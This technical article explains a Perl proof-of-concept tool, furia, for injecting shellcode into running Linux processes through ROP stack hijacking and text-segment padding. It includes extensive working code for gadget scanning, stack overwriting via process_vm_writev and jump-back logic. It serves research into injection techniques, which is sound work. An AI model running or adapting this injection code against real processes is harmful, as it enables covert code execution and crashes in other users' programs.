Furia
An approach for process injection with Perl.
Last revision: April 15th, 2025.
- Introduction
- ROP stack hijacking
- ROP stack hijacking meets Text segment padding
- Implementation
- Get start address of memory regions
- Get available padding bytes
- Get stack return address
- Find ROP gadgets
- process_vm_writev syscall
- Overwrite stack to change memory permissions
- Jump back to entry point
- Write shellcode and restart execution
- Future work
1. Introduction
The usual approach for process injection in Linux involves overwriting the memory of a process with shellcode, executing that payload while the process is running, and then restoring the execution flow of the injected process. The memory of another process can be manipulated with the ptrace and process_vm_writev syscalls, or by interacting directly with the proc file system. These methods require either running with the same UID as the user who owns the target process or having root access on the system. A detailed writeup on how to use and combine these methods can be found in "The Definitive Guide to Linux Process Injection" by Akamai, which includes the "ROP stack hijacking" technique, described as the first public demonstration of an injection technique that relies only on the process_vm_writev syscall. This article describes the implementation of furia, a proof-of-concept tool written in Perl for injecting code into a running process based on the ROP stack hijacking method. The motivation for this work is to explore the possibilities of process injection in Linux x86_64 using a toolset available by default in most distributions. In addition, to date I'm not aware of any other public Perl artifacts that use the process_vm_writev syscall, much less use it for process injection. Source code of furia can be found here.
2. ROP stack hijacking
The idea behind the stack hijacking technique is to take control of the execution flow of a process without modifying any executable memory or registers. However, for it to be usable there must be a jump to a shellcode residing in the executable memory. Since most memory regions don't have both write and execution permissions, the approach is to write the shellcode in a writable memory region and then make it executable. This can be achieved by combining the stack hijacking technique and return-oriented programming, overwriting the process stack with a ROP chain that uses executable gadgets already present in the process memory. A step-by-step description and C code can be found in The Definitive Guide to Linux Process Injection.
3. ROP stack hijacking meets Text segment padding
The ROP stack hijacking technique described above overwrites the writable memory of the process without restoring its previous content, although the Akamai article does provide some guidelines for process recovery. This article presents an alternative approach that uses the Text Segment Padding technique to inject shellcode into the available padding bytes of the text segment. To achieve this, the executable memory region must first be marked as writable by hijacking the stack; the shellcode can then be written to memory and executed. Process recovery is obtained by jumping to the process entry point, which restarts the execution flow of the main program. The steps are as follows:
- Find process entry point and available padding bytes in executable memory.
- Identify a stack return address from the process executable region.
- Pause process execution (SIGSTOP).
- Construct ROP chain to call mprotect and mark padding bytes writable.
- Overwrite process stack (at the return address) to place the ROP chain.
- Continue process execution (SIGCONT).
- Identify new stack return address from the process executable region.
- Pause process execution again (SIGSTOP).
- Write payload in available padding bytes (after .fini).
- Write jmp instruction after payload to return to process entry point.
- Overwrite process stack (at new return address) to place payload address.
- Continue process execution (SIGCONT).
This modified version of the ROP stack hijacking technique is not ideal but is enough for a proof-of-concept tool.
4. Implementation
Relevant parts of the implementation will be discussed in this section. Most of the code for steps of the ROP stack hijacking technique is similar to the original C implementation published by Akamai. The rest is either new or taken from previous work I've done.
4.1 Get start address of memory regions
The start addresses of different memory regions and external libraries are used throughout the injection process. To obtain these addresses, the get_start_addr subroutine parses the maps file of the target process, searching for the first occurrence of a given pattern. For example, the base address of the process can be found with a simple search for the pattern r--. Similarly, the start address of the process executable region can be found with the pattern r-x, and the base address of libc with the pattern libc.
    sub get_start_addr {
        my $pid = shift;
        my $pattern = shift;

        open my $FH, '<', "/proc/$pid/maps" or die "[-] $!\n";

        my $start_addr;
        foreach my $line(<$FH>) {
            if($line =~ /$pattern/mg) {
                $start_addr = (split("-", $line))[0];
                last;
            }
        }
        close $FH;

        return $start_addr;
    }

    [...]

    my $base_addr = (strtol(get_start_addr($pid, "r--"), 16))[0];
    [...]
    my $libc_base = (strtol(get_start_addr($pid, "libc"), 16))[0];
    [...]
    my $rx_addr = (strtol(get_start_addr($pid, "r-x"), 16))[0];
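To make the pattern search concrete without needing a live target, here is a minimal sketch that runs the same first-match logic over a few made-up maps lines. The helper name first_start_addr and all addresses are assumptions for illustration and are not part of furia.

```perl
use strict;
use warnings;
use POSIX qw(strtol);

# Made-up lines in the format of /proc/<pid>/maps; real addresses will differ.
my @maps = (
    "00400000-00401000 r--p 00000000 08:01 131 /usr/bin/target",
    "00401000-00402000 r-xp 00001000 08:01 131 /usr/bin/target",
    "7f100000-7f128000 r--p 00000000 08:01 942 /usr/lib/x86_64-linux-gnu/libc.so.6",
);

# Hypothetical helper (not part of furia): numeric start address of the
# first line containing $pattern, or undef when nothing matches.
sub first_start_addr {
    my ($pattern, @lines) = @_;
    foreach my $line (@lines) {
        next unless index($line, $pattern) >= 0;
        my ($start) = split /-/, $line;
        return (strtol($start, 16))[0];
    }
    return;
}

printf("base: 0x%x\n", first_start_addr("r--",  @maps));
printf("text: 0x%x\n", first_start_addr("r-x",  @maps));
printf("libc: 0x%x\n", first_start_addr("libc", @maps));
```

Because only the first match is returned, the result depends on the order of the lines: the r-- lookup yields the base of the main binary only as long as its mapping is listed before any other read-only mapping, which is the layout assumed here.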
4.2 Get available padding bytes
The number of available padding bytes is calculated as the gap between the end of the .fini section and the start of the .rodata section. The first step, then, is to find the .fini section in the process binary. After the ELF header is read from the exe file in procfs, a seek is performed to the start of the section header table using the value $e_shoff. Then the first 18 entries (each of size $e_shentsize) in the section header table are read and unpacked. The .fini section is identified as the first section after the 15th entry with $sh_flags = 6 (AX) and $sh_addralign = 4. After finding .fini, the next section (.rodata) is read to calculate the size of the padding. Finally, the get_fini_padding subroutine returns the size of the available padding, the process entry point, and the offset for the shellcode ($sh_offset + $sh_size of .fini). This approach is based on "House of Pain: A practical approach for an x86-64 ELF virus", sections 3.3, 5.5 and 5.6.
    sub get_fini_padding {
        my $pid = shift;

        open my $FH, '<', "/proc/$pid/exe" or die "[-] $!\n";

        # read elf header
        read $FH, my $buff, 64;
        my @e = unpack("C a a a C12 S2 I q3 I S6", $buff);

        # skip non-elfs (any mismatch in the magic bytes is enough to reject)
        if($e[0] != 127 || $e[1] ne 'E' || $e[2] ne 'L' || $e[3] ne 'F') {
            die "[-] executable doesn't look like a valid elf\n";
        }

        my ($sh_flags, $sh_offset, $sh_size, $sh_addralign);
        my ($e_entry, $e_shoff, $e_shentsize) = ($e[19], $e[21], $e[26]);

        seek $FH, $e_shoff, 0;

        for(my $i = 0; $i < 18; $i++) {
            read $FH, my $buff, $e_shentsize;
            my @u = unpack("I2 q4 I2 q2", $buff);

            ($sh_flags, $sh_addralign) = ($u[2], $u[8]);

            # first sh_flags=6 && sh_addralign=4 after 15th entry should be .fini
            if($sh_flags == 6 && $sh_addralign == 4 && $i>15) {
                ($sh_offset, $sh_size) = ($u[4], $u[5]) if(!$sh_offset);
            }

            # .fini was found
            last if($sh_offset);
        }

        die "[-] .fini not found\n" if(!$sh_offset);

        # read next section header entry (.rodata)
        read $FH, $buff, $e_shentsize;
        my @u = unpack("I2 q4 I2 q2", $buff);

        close $FH;

        # free space: .rodata sh_offset - (.fini sh_offset + .fini sh_size)
        my $padding_bytes = $u[4] - ($sh_offset + $sh_size);

        return ($e_entry, $padding_bytes, $sh_offset + $sh_size);
    }

    [...]

    my ($entry, $padding_bytes, $offset) = get_fini_padding($pid);
    [...]
    if($padding_bytes < length($payload) + 5) {
        printf("[-] not enough space for injecting the payload. aborting...\n");
    }
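The field indices used above can be checked against a synthetic header. The sketch below packs a made-up ELF64 header and two made-up section headers with the same templates, then recomputes the padding the same way get_fini_padding does. Every value is an assumption chosen for illustration and does not come from a real binary.

```perl
use strict;
use warnings;

# Same templates as the listing above.
my $EHDR = "C a a a C12 S2 I q3 I S6";   # 64-byte ELF64 header
my $SHDR = "I2 q4 I2 q2";                # 64-byte section header entry

# Synthetic ELF header; all values are made up.
my $hdr = pack($EHDR,
    0x7f, 'E', 'L', 'F',         # magic bytes
    2, 1, 1, 0, (0) x 8,         # remaining 12 bytes of e_ident
    3, 62,                       # e_type (ET_DYN), e_machine (EM_X86_64)
    1,                           # e_version
    0x1040, 64, 0x3a08,          # e_entry, e_phoff, e_shoff
    0,                           # e_flags
    64, 56, 13, 64, 31, 30);     # ehsize, phentsize, phnum, shentsize, shnum, shstrndx

my @e = unpack($EHDR, $hdr);
my ($e_entry, $e_shoff, $e_shentsize) = ($e[19], $e[21], $e[26]);
printf("e_entry=0x%x e_shoff=0x%x e_shentsize=%d\n", $e_entry, $e_shoff, $e_shentsize);

# Synthetic .fini (flags 6 = AX) and .rodata (flags 2 = A) entries.
# Field order: name, type, flags, addr, offset, size, link, info, addralign, entsize
my $fini   = pack($SHDR, 0, 1, 6, 0x1234, 0x1234, 0xd,   0, 0, 4, 0);
my $rodata = pack($SHDR, 0, 1, 2, 0x2000, 0x2000, 0x100, 0, 0, 4, 0);

my @f = unpack($SHDR, $fini);
my @r = unpack($SHDR, $rodata);

my $payload_offset = $f[4] + $f[5];             # end of .fini
my $padding_bytes  = $r[4] - $payload_offset;   # gap up to .rodata
printf("payload offset=0x%x padding=%d bytes\n", $payload_offset, $padding_bytes);
```

With these numbers .fini ends at 0x1241 and .rodata starts at 0x2000, leaving 3519 bytes, so a payload plus the 5-byte jmp would fit only if it is no longer than that.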
4.3 Get stack return address
The next step is to find an address within the range of the process executable memory for returning to the stack. This is achieved first by extracting the last but one entry from the process syscall file, which corresponds to the process stack pointer. The memory file is then parsed starting at the stack pointer offset, reading 8 bytes at a time and checking if the read value is an address within the range of the process executable memory. The first match is returned.
    sub get_stack_pointer {
        my $pid = shift;

        open my $FH, '<', "/proc/$pid/syscall" or die "[-] $!\n";
        my $line = <$FH>;
        close $FH;

        my @syscalls = split(" ", $line);

        # last but one field is the stack pointer
        return $syscalls[$#syscalls - 1];
    }

    [...]

    sub get_stack_ret_addr {
        my $pid = shift;
        my $text_addr = shift;
        my $text_size = 4096;

        my $stack_pointer = (strtol(get_stack_pointer($pid), 16))[0];
        printf("[+] found stack pointer 0x%x\n", $stack_pointer);

        open my $FH, '<', "/proc/$pid/mem" or die "[-] $!\n";
        seek $FH, $stack_pointer, 0;

        while((read $FH, my $buff, 8)) {
            $buff = unpack("Q", $buff);
            $stack_pointer += 8;

            # first value that points inside the executable region
            if(($buff > $text_addr) && (($buff - $text_addr) < $text_size)) {
                $stack_pointer -= 8;
                close $FH;
                return $stack_pointer;
            }
        }
        close $FH;

        return 0;
    }

    [...]

    my $stack_ret_addr = get_stack_ret_addr($pid, $rx_addr);
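The scan itself is easy to try on a buffer instead of /proc/$pid/mem. The following sketch applies the same range test to a made-up stack dump. The helper name find_ret_slot and all values are assumptions for illustration, and a 64-bit perl is assumed for the "Q" template.

```perl
use strict;
use warnings;

# Hypothetical helper (not part of furia): walk a stack dump 8 bytes at a
# time and return the address of the first slot whose value falls inside
# the range (text_addr, text_addr + text_size).
sub find_ret_slot {
    my ($stack, $sp, $text_addr, $text_size) = @_;
    for (my $off = 0; $off + 8 <= length($stack); $off += 8) {
        my $val = unpack("Q", substr($stack, $off, 8));
        if ($val > $text_addr && ($val - $text_addr) < $text_size) {
            return $sp + $off;
        }
    }
    return 0;
}

# Made-up stack contents: two non-code values, one return address
# into the text region, one more stack value.
my $stack = pack("Q4", 0x7ffd0000, 0, 0x401136, 0x7ffd0010);

my $slot = find_ret_slot($stack, 0x7ffc1000, 0x401000, 4096);
printf("return address slot at 0x%x\n", $slot);
```

The third slot holds 0x401136, which lies within one page of 0x401000, so the helper reports the address of that slot (stack pointer plus 16) rather than the value stored in it. That slot address is what gets overwritten later.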
4.4 Find ROP gadgets
The C implementation of the ROP stack hijacking technique uses hardcoded values for the ROP gadgets. furia, on the other hand, searches for gadgets inside libc.so by parsing the shared object file one byte at a time (starting at the offset held in $e_shoff) and checking for a RET instruction (opcode 0xc3). Note that in the listing this variable is loaded from index 19 of the unpacked header, which in the template used is the e_entry field, so the scan effectively starts at the libc entry point offset. When a RET is found, the previously read byte is checked to see if it is one of the gadgets used in the ROP chain: pop rax, pop rdi, pop rsi, pop rdx. If so, the offset is stored for later use. The search ends when all four gadgets are found.
    # opcodes for ROP gadgets (x86_64)
    my %OPS = (
        "pop_rax" => 0x58,
        "pop_rdx" => 0x5a,
        "pop_rsi" => 0x5e,
        "pop_rdi" => 0x5f,
        "ret"     => 0xc3
    );

    # addresses of ROP gadgets found
    my %GADGETS = (
        "pop_rax" => 0,
        "pop_rdx" => 0,
        "pop_rsi" => 0,
        "pop_rdi" => 0
    );

    [...]

    sub find_gadgets {
        my $libc = (DynaLoader::dl_findfile("libc.so.6"))[0];
        print "[+] found libc at $libc\n";

        open my $FH, '<', "$libc" or die "[-] $!\n";

        # read elf header
        read $FH, my $buff, 64;
        my @e = unpack("C a a a C12 S2 I q3 I S6", $buff);
        # note: index 19 is e_entry in this template (e_shoff is index 21)
        my $e_shoff = $e[19];

        # skip false positives in header information
        seek $FH, $e_shoff, 0;

        print "[+] searching for gadgets...\n";
        my ($gadgets, $offset, $curr, $prev) = (0, $e_shoff, 0x0, 0x0);

        while((read $FH, $curr, 1)) {
            $offset++;
            $curr = unpack("C", $curr);

            # lazy check
            # check for OPCODE + RET (e.g. pop rax; ret -- \x58\xc3)
            if($curr == $OPS{"ret"}) {
                if(!$GADGETS{"pop_rax"} && $prev == $OPS{"pop_rax"} ) {
                    $GADGETS{"pop_rax"} = $offset - 2;
                    printf("[+] found 'pop rax' at 0x%x\n", $GADGETS{"pop_rax"});
                    $gadgets++;
                } elsif(!$GADGETS{"pop_rdi"} && $prev == $OPS{"pop_rdi"} ) {
                    $GADGETS{"pop_rdi"} = $offset - 2;
                    printf("[+] found 'pop rdi' at 0x%x\n", $GADGETS{"pop_rdi"});
                    $gadgets++;
                } elsif(!$GADGETS{"pop_rsi"} && $prev == $OPS{"pop_rsi"} ) {
                    $GADGETS{"pop_rsi"} = $offset - 2;
                    printf("[+] found 'pop rsi' at 0x%x\n", $GADGETS{"pop_rsi"});
                    $gadgets++;
                } elsif(!$GADGETS{"pop_rdx"} && $prev == $OPS{"pop_rdx"} ) {
                    $GADGETS{"pop_rdx"} = $offset - 2;
                    printf("[+] found 'pop rdx' at 0x%x\n", $GADGETS{"pop_rdx"});
                    $gadgets++;
                }
            }

            $prev = $curr;
            last if($gadgets == 4);
        }

        close $FH;
    }

    find_gadgets();

    my $pop_rax = get_hex_addr($libc_base + $GADGETS{"pop_rax"});
    my $pop_rdi = get_hex_addr($libc_base + $GADGETS{"pop_rdi"});
    my $pop_rsi = get_hex_addr($libc_base + $GADGETS{"pop_rsi"});
    my $pop_rdx = get_hex_addr($libc_base + $GADGETS{"pop_rdx"});
    my $syscall = get_hex_addr($libc_base + 0x00000000001019e0);
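As a compact illustration of the same opcode-plus-RET check, the sketch below scans an in-memory byte string with a regular expression instead of reading a file byte by byte. This is a swapped-in technique, not the method furia uses. The helper name scan_gadgets, the sample bytes and the base offset are assumptions.

```perl
use strict;
use warnings;

# Hypothetical helper (not part of furia): return a hash mapping gadget
# names to the offset of their first "pop reg; ret" byte pair.
sub scan_gadgets {
    my ($bytes, $base) = @_;
    my %names = (
        0x58 => "pop_rax",
        0x5a => "pop_rdx",
        0x5e => "pop_rsi",
        0x5f => "pop_rdi",
    );
    my %found;
    # one of the four pop opcodes immediately followed by ret (0xc3)
    while ($bytes =~ /([\x58\x5a\x5e\x5f])\xc3/g) {
        my $name = $names{ord($1)};
        $found{$name} //= $base + $-[0];   # keep only the first hit
    }
    return %found;
}

# Made-up code bytes: nop nop | pop rdi; ret | mov-like bytes | pop rax; ret
# | pop rsi; ret | pop rdx; ret
my $code = "\x90\x90\x5f\xc3\x48\x89\x58\xc3\x5e\xc3\x5a\xc3";

my %g = scan_gadgets($code, 0x1000);
printf("%s at 0x%x\n", $_, $g{$_}) for sort keys %g;
```

Like the byte-wise loop, this matches raw byte pairs without decoding instructions, so a hit may sit in the middle of a longer instruction (the 0x58 0xc3 pair in the sample follows 0x48 0x89 on purpose). That is acceptable for ROP as long as the bytes lie in executable memory.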
Another gadget used in the ROP chain is the address of mprotect, which could also be found in the libc shared object by parsing its headers. For the initial version of furia, however, this value is obtained with readelf, for example:
    $ readelf -s /usr/lib/x86_64-linux-gnu/libc.so.6 | grep mprotect
      2046: 00000000001019e0    33 FUNC    WEAK   DEFAULT   16 mprotect@@GLIBC_2.2.5
4.5 process_vm_writev syscall
The process_vm_writev syscall is defined as a function expecting six arguments, including two struct iovec pointers (local_iov and remote_iov):
    ssize_t process_vm_writev(pid_t pid,
                              const struct iovec *local_iov,
                              unsigned long liovcnt,
                              const struct iovec *remote_iov,
                              unsigned long riovcnt,
                              unsigned long flags);
Similarly, iovec is defined as a struct with two values, a void pointer iov_base for the starting memory address and a size_t for iov_len, the number of bytes to transfer:
    struct iovec {
        void   *iov_base;  /* Starting address */
        size_t  iov_len;   /* Number of bytes to transfer */
    };
While Perl provides a native interface for calling syscalls, it doesn't provide native data structures to handle C structs. However, the struct values for process_vm_writev can be built by simply packing and concatenating the iovec fields. For string values in iov_base the data is packed as a pointer to a string ("p" template), and for integer values the data is packed as a pointer to an integer ("Q" template and get_iv subroutine). In practice, only the iov_base pointer of the local_iov struct can contain pointers to strings or integers; remote_iov seems to always contain pointers to integers.
    sub call_writev {
        my $pid = shift;
        my $local_arg = shift;
        my $local_type = shift;
        my $local_size = shift;
        my $remote_arg = shift;
        my $remote_size = shift;

        my $liovcnt = 1;
        my $riovcnt = 1;
        my $flags = 0;

        my ($local, $remote);

        # struct iovec local_iov = { iov_base, iov_len }
        $local = pack("$local_type", $local_arg);
        $local .= pack("Q", $local_size);

        # struct iovec remote_iov = { iov_base, iov_len }
        $remote = pack("Q", $remote_arg);
        $remote .= pack("Q", $remote_size);

        # 311 is process_vm_writev on x86_64
        syscall(311, $pid, $local, $liovcnt, $remote, $riovcnt, $flags);
    }
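The layout produced by this packing can be inspected without issuing the syscall. The sketch below builds one local and one remote iovec and checks that each is 16 bytes, matching struct iovec on x86_64. The data and the remote address are made up, and a 64-bit perl is assumed (8-byte pointers and support for the "Q" template).

```perl
use strict;
use warnings;

my $data        = "\x90\x90\x90\x90";   # bytes to transfer (made up)
my $remote_addr = 0x401000;             # made-up address in the target

# local_iov: pointer to the bytes of $data, followed by their length
my $local  = pack("p", $data) . pack("Q", length($data));

# remote_iov: numeric address in the target, followed by the byte count
my $remote = pack("Q", $remote_addr) . pack("Q", length($data));

my ($l_base, $l_len) = unpack("Q2", $local);
my ($r_base, $r_len) = unpack("Q2", $remote);

printf("local_iov:  %d bytes, iov_base=0x%x iov_len=%d\n", length($local),  $l_base, $l_len);
printf("remote_iov: %d bytes, iov_base=0x%x iov_len=%d\n", length($remote), $r_base, $r_len);
```

The "p" template stores the address of the string buffer held by $data, so $data has to stay alive and unmodified until the syscall has been made. Packing a temporary value instead of a variable makes Perl warn about exactly that.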
4.6 Overwrite stack to change memory permissions
All things ready, the process is paused and the stack is overwritten at the stack return address with the instructions to call mprotect for making the executable section writable. Then a signal is sent to the process to continue execution.
    print "[+] trying to stop process with PID $pid\n";
    kill 'SIGSTOP', $pid;

    # pop rdi - address -> rdi
    writev_ptr($pid, $pop_rdi, 8, $stack_ret_addr, 8);
    $stack_ret_addr += 8;
    writev_ptr($pid, $rx_addr_hex, 8, $stack_ret_addr, 8);
    $stack_ret_addr += 8;

    # pop rsi - region size -> rsi
    writev_ptr($pid, $pop_rsi, 8, $stack_ret_addr, 8);
    $stack_ret_addr += 8;
    writev_int($pid, get_iv($region_size), 8, $stack_ret_addr, 8);
    $stack_ret_addr += 8;

    # pop rdx - 07 -> rdx
    writev_ptr($pid, $pop_rdx, 8, $stack_ret_addr, 8);
    $stack_ret_addr += 8;
    writev_int($pid, get_iv($prot_rwx), 8, $stack_ret_addr, 8);
    $stack_ret_addr += 8;

    # pop rax - 10 -> rax
    writev_ptr($pid, $pop_rax, 8, $stack_ret_addr, 8);
    $stack_ret_addr += 8;
    writev_int($pid, get_iv($mprotect_syscall), 8, $stack_ret_addr, 8);
    $stack_ret_addr += 8;

    print "[+] calling mprotect\n";
    writev_ptr($pid, $syscall, 8, $stack_ret_addr, 8);
    $stack_ret_addr += 8;
    writev_ptr($pid, $entry_hex, 8, $stack_ret_addr, 8);
    $stack_ret_addr += 8;

    # continue process and wait a few seconds for the stack
    kill 'SIGCONT', $pid;
    sleep 1;
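To visualize what ends up on the stack, the sketch below lays out the same ten 8-byte slots as a single packed buffer. It only builds and prints the chain and performs no write. All addresses are made up, the variable names are assumptions, and writing the buffer in one call instead of ten is a possible variation rather than what furia does.

```perl
use strict;
use warnings;

# Made-up gadget and target addresses (a real run resolves them from libc).
my %addr = (
    pop_rdi  => 0x7f02a3e5,
    pop_rsi  => 0x7f02be51,
    pop_rdx  => 0x7f0904a8,
    pop_rax  => 0x7f045eb0,
    mprotect => 0x7f1019e0,
);
my $rx_addr     = 0x401000;   # start of the executable region
my $region_size = 4096;       # one page
my $prot_rwx    = 7;          # PROT_READ | PROT_WRITE | PROT_EXEC
my $mprotect_nr = 10;         # mprotect syscall number on x86_64
my $entry       = 0x401040;   # where execution resumes afterwards

# Each "pop reg; ret" gadget consumes the slot that follows it.
my @chain = (
    $addr{pop_rdi}, $rx_addr,
    $addr{pop_rsi}, $region_size,
    $addr{pop_rdx}, $prot_rwx,
    $addr{pop_rax}, $mprotect_nr,
    $addr{mprotect},
    $entry,
);

my $rop = pack("Q*", @chain);
printf("chain is %d bytes\n", length($rop));
printf("  +0x%02x: 0x%x\n", $_ * 8, $chain[$_]) for 0 .. $#chain;
```

Read top to bottom, the slots show the order in which the target consumes them once the hijacked return executes: three argument registers, the syscall number, the call itself, and finally the entry point as the next return address.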
4.7 Jump back to entry point
Program execution is restored by making a relative jump to the process entry point (appended after the shellcode). This jump is calculated as the difference between the entry point and the .fini offset + length of the payload + 5 (1 byte for the jmp instruction and 4 bytes for the relative address).
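    # distance from the end of the jmp instruction back to the entry point
    my $dist = $offset + length($payload) + 5 - $entry;
    # negate and truncate to a 32-bit two's complement displacement
    $dist = -$dist & 0xffffffff;
    my $jmp = "\xe9".pack("V", $dist);
    $payload = $payload.$jmp;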
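A worked example with small numbers may help check the arithmetic. The values below (entry point 0x1040, shellcode offset 0x2000, a 32-byte payload) are made up. The sketch encodes the jump and then decodes it again to confirm that it lands on the entry point.

```perl
use strict;
use warnings;

my $entry   = 0x1040;        # made-up process entry point
my $offset  = 0x2000;        # made-up end of .fini, where the payload starts
my $payload = "\x90" x 32;   # placeholder payload (nops)

# Address of the instruction following the 5-byte jmp.
my $next = $offset + length($payload) + 5;

# rel32 = target - next, truncated to 32 bits (two's complement).
my $rel32 = ($entry - $next) & 0xffffffff;
my $jmp   = "\xe9" . pack("V", $rel32);

printf("jmp bytes: %s\n", unpack("H*", $jmp));   # prints e91bf0ffff

# Decode again: read the displacement as a signed little-endian 32-bit value.
my $disp   = unpack("l<", substr($jmp, 1));
my $target = $next + $disp;
printf("displacement %d lands at 0x%x\n", $disp, $target);
```

Here the next instruction would sit at 0x2025, so the displacement is 0x1040 - 0x2025 = -4069, encoded as 0xfffff01b in little-endian order.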
4.8 Write shellcode and restart execution
Finally, the process is paused once again and the shellcode is injected in the available padding bytes. The stack is overwritten with the address of the injected shellcode and then a signal is sent to the process to continue execution.
    kill 'SIGSTOP', $pid;

    # new return to stack
    my $stack_ret_addr = get_stack_ret_addr($pid, $rx_addr);
    printf("[+] found new stack ret addr at 0x%x\n", $stack_ret_addr);

    print "[+] writing payload to rwx padding bytes\n";
    writev_ptr($pid, $payload, length($payload), $target_addr, length($payload));
    writev_ptr($pid, $target_addr_hex, 8, $stack_ret_addr, 8);

    # let the chips fall where they may
    kill 'SIGCONT', $pid;
5. Future work
The work described in this article is enough for a proof-of-concept tool. Some aspects that need to be improved or changed in the future are:
- Injection doesn't always work smoothly. Sometimes it causes a segmentation fault.
- Process is restarted (jump back to its entry point) each time the stack is hijacked. This means that the execution flow is restored but the original state of the process is lost.
- The search algorithm for stack return addresses is straightforward and works on the tested binaries. Injection into more complex programs might require more elaborate search algorithms.
- For simplicity, the size of the text section is assumed to be 4096 bytes (one page). This number should be calculated from the actual size of the executable memory region.
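As one possible direction for the last item, the size of the executable region could be derived from the same maps line that already provides its start address, since each line carries both ends of the range. This is a minimal sketch under that assumption. The helper name region_size and the sample line are made up and not part of furia.

```perl
use strict;
use warnings;
use POSIX qw(strtol);

# Hypothetical helper (not part of furia): size in bytes of the region
# described by one /proc/<pid>/maps line, or undef if the line is malformed.
sub region_size {
    my ($line) = @_;
    my ($start, $end) = $line =~ /^([0-9a-f]+)-([0-9a-f]+)\s/
        or return;
    return (strtol($end, 16))[0] - (strtol($start, 16))[0];
}

# Made-up r-x mapping spanning three pages.
my $line = "00401000-00404000 r-xp 00001000 08:01 131 /usr/bin/target";

my $size = region_size($line);
printf("executable region is %d bytes (%d pages)\n", $size, $size / 4096);
```

The result could replace the fixed $text_size used when scanning the stack, so that return addresses beyond the first page of the text segment are also recognized.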